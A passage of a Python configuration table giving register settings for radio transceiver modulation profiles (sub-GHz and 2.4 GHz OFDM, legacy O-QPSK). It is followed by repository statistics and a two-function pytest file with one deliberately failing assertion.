(RG_RF09_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x02)],
# subGHz_ofdm_3_mcs3
'subGHz_ofdm_200kbps_400kHz_mcs3': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
(RG_RF09_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x03)],
# subGHz_ofdm_3_mcs4
'subGHz_ofdm_300kbps_400kHz_mcs4': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
(RG_RF09_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x04)],
# subGHz_ofdm_3_mcs5
'subGHz_ofdm_400kbps_400kHz_mcs5': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
(RG_RF09_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x05)],
# subGHz_ofdm_3_mcs6
'subGHz_ofdm_600kbps_400kHz_mcs6': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
(RG_RF09_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x06)],
# subGHz_ofdm_4_mcs2
'subGHz_ofdm_50kbps_200kHz_mcs2': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x12),
(RG_RF09_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x03), # recommended value ()
(RG_RF09_TXDFE, 0x46),
(RG_RF09_PAC, 0x7B), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1B~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x03),
(RG_BBC0_OFDMPHRTX, 0x02)],
# subGHz_ofdm_4_mcs3
'subGHz_ofdm_100kbps_200kHz_mcs3': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x12),
(RG_RF09_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x03), # recommended value ()
(RG_RF09_TXDFE, 0x46),
(RG_RF09_PAC, 0x7B), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1B~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x03),
(RG_BBC0_OFDMPHRTX, 0x03)],
# subGHz_ofdm_4_mcs4
'subGHz_ofdm_150kbps_200kHz_mcs4': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x12),
(RG_RF09_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x03), # recommended value ()
(RG_RF09_TXDFE, 0x46),
(RG_RF09_PAC, 0x7B), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1B~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x03),
(RG_BBC0_OFDMPHRTX, 0x04)],
# subGHz_ofdm_4_mcs5
'subGHz_ofdm_200kbps_200kHz_mcs5': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x12),
(RG_RF09_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x03), # recommended value ()
(RG_RF09_TXDFE, 0x46),
(RG_RF09_PAC, 0x7B), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1B~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x03),
(RG_BBC0_OFDMPHRTX, 0x05)],
# subGHz_ofdm_4_mcs6
'subGHz_ofdm_300kbps_200kHz_mcs6': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x12),
(RG_RF09_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x03), # recommended value ()
(RG_RF09_TXDFE, 0x46),
(RG_RF09_PAC, 0x7B), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1B~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x03),
(RG_BBC0_OFDMPHRTX, 0x06)],
# legacy
'oqpsk_250kbps_2000kHz': [
(RG_BBC1_PC, 0x1F),
(RG_BBC1_OQPSKPHRTX, 0x09), # # QPSK - legacy
(RG_BBC1_OQPSKC0, 0x03), # # 2000 kchips/s
(RG_BBC1_OQPSKC1, 0x47), # MINIMUM preamble-detection sensitivities, rx-override enabled
(RG_BBC1_OQPSKC2, 0x05), # FCS type legacy (16bit) & listen for LEG-OQPSK frames only
(RG_BBC1_OQPSKC3, 0x00), # legacy OQPSK, search for SFD_1 only
(RG_BBC0_IRQM, 0x00), # # TXFE, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x13), # TXFE, RXFE, RXFS interrupts enabled
(RG_RF09_IRQM, 0x00), # # TRXERR, TRXRDY interrupts enabled
(RG_RF24_IRQM, 0x12), # TRXERR, TRXRDY interrupts enabled
(RG_RF24_RXBWC, 0x0B), # # Rx BW 2000kHz, IF 2000kHz
(RG_RF24_RXDFE, 0x41), # #
(RG_RF24_AGCC, 0x01), #
(RG_RF24_EDD, 0x13), #
(RG_RF24_AGCS, 0x77), #
(RG_RF24_TXCUTC, 0x0B), # # .PARAMP = 3, .LPFCUT = 7
(RG_RF24_TXDFE, 0x81), # # .SR = 0xA, .RCUT = 3
(RG_RF24_PAC, 0x75)], # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x15~8dBm
# 2400MHz_ofdm_1_mcs0
'2400MHz_ofdm_100kbps_1200kHz_mcs0': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x1A),
(RG_RF24_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x83),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x1E), # NO FCS FILTER in RX, FCS automatically added in TX, FCS 2 bytes
(RG_BBC1_OFDMC, 0x00),
(RG_BBC1_OFDMPHRTX, 0x00)],
# 2400MHz_ofdm_1_mcs1
'2400MHz_ofdm_200kbps_1200kHz_mcs1': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x1A),
(RG_RF24_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x83),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x1E), # NO FCS FILTER in RX, FCS automatically added in TX, FCS 2 bytes
(RG_BBC1_OFDMC, 0x00),
(RG_BBC1_OFDMPHRTX, 0x01)],
# 2400MHz_ofdm_1_mcs2
'2400MHz_ofdm_400kbps_1200kHz_mcs2': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x1A),
(RG_RF24_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x83),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x1E), # NO FCS FILTER in RX, FCS automatically added in TX, FCS 2 bytes
(RG_BBC1_OFDMC, 0x00),
(RG_BBC1_OFDMPHRTX, 0x02)],
# 2400MHz_ofdm_1_mcs3
'2400MHz_ofdm_800kbps_1200kHz_mcs3': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x1A),
(RG_RF24_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x83),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x1E), # NO FCS FILTER in RX, FCS automatically added in TX, FCS 2 bytes
(RG_BBC1_OFDMC, 0x00),
(RG_BBC1_OFDMPHRTX, 0x03)],
# 2400MHz_ofdm_2_mcs0
'2400MHz_ofdm_50kbps_800kHz_mcs0': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x00)],
# 2400MHz_ofdm_2_mcs1
'2400MHz_ofdm_100kbps_800kHz_mcs1': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x01)],
# 2400MHz_ofdm_2_mcs2
'2400MHz_ofdm_200kbps_800kHz_mcs2': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x02)],
# 2400MHz_ofdm_2_mcs3
'2400MHz_ofdm_400kbps_800kHz_mcs3': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x03)],
# 2400MHz_ofdm_2_mcs4
'2400MHz_ofdm_600kbps_800kHz_mcs4': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x04)],
# 2400MHz_ofdm_2_mcs5
'2400MHz_ofdm_800kbps_800kHz_mcs5': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x05)],
# 2400MHz_ofdm_3_mcs1
'2400MHz_ofdm_50kbps_400kHz_mcs1': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x01)],
# 2400MHz_ofdm_3_mcs2
'2400MHz_ofdm_100kbps_400kHz_mcs2': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x02)],
# 2400MHz_ofdm_3_mcs3
'2400MHz_ofdm_200kbps_400kHz_mcs3': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x03)],
# 2400MHz_ofdm_3_mcs4
'2400MHz_ofdm_300kbps_400kHz_mcs4': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x04)],
# 2400MHz_ofdm_3_mcs5
'2400MHz_ofdm_400kbps_400kHz_mcs5': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x05)],
# 2400MHz_ofdm_3_mcs6
'2400MHz_ofdm_600kbps_400kHz_mcs6': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x06)],
# 2400MHz_ofdm_4_mcs2
'2400MHz_ofdm_50kbps_200kHz_mcs2': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x03),
(RG_RF24_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x03), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x46),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x03),
(RG_BBC1_OFDMPHRTX, 0x02)],
# 2400MHz_ofdm_4_mcs3
'2400MHz_ofdm_100kbps_200kHz_mcs3': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x03),
(RG_RF24_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x03), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x46),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x03),
(RG_BBC1_OFDMPHRTX, 0x03)],
# 2400MHz_ofdm_4_mcs4
'2400MHz_ofdm_150kbps_200kHz_mcs4': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x03),
(RG_RF24_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x03), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x46),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x03),
(RG_BBC1_OFDMPHRTX, 0x04)],
# 2400MHz_ofdm_4_mcs5
'2400MHz_ofdm_200kbps_200kHz_mcs5': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x03),
(RG_RF24_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x03), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x46),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x03),
(RG_BBC1_OFDMPHRTX, 0x05)],
# 2400MHz_ofdm_4_mcs6
'2400MHz_ofdm_300kbps_200kHz_mcs6': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x03),
(RG_RF24_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x03), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x46),
(RG_RF24_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x03),
(RG_BBC1_OFDMPHRTX, 0x06)]
} | 43.361484 | 142 | 0.533701 | 6,795 | 54,939 | 3.94805 | 0.055629 | 0.078279 | 0.038767 | 0.023707 | 0.800947 | 0.767697 | 0.744809 | 0.738882 | 0.731986 | 0.729004 | 0 | 0.196066 | 0.355995 | 54,939 | 1,267 | 143 | 43.361484 | 0.562166 | 0.245618 | 0 | 0.735376 | 0 | 0 | 0.055098 | 0.050512 | 0 | 0 | 0.109439 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7af6814d5af64e09d98dfdcd8fb80ef83e6ede79 | 124 | py | Python | test/test_init.py | SasiDharKM/CSC510-Team14 | 4325e1d78874899a94549d338541770ddb589cc5 | [
"MIT"
] | null | null | null | test/test_init.py | SasiDharKM/CSC510-Team14 | 4325e1d78874899a94549d338541770ddb589cc5 | [
"MIT"
] | null | null | null | test/test_init.py | SasiDharKM/CSC510-Team14 | 4325e1d78874899a94549d338541770ddb589cc5 | [
"MIT"
] | 1 | 2020-08-13T01:53:07.000Z | 2020-08-13T01:53:07.000Z | import code as cd
def test_answer_fail():
assert cd.inc(3) == 5
def test_answer_pass():
assert cd.inc(4) == 5
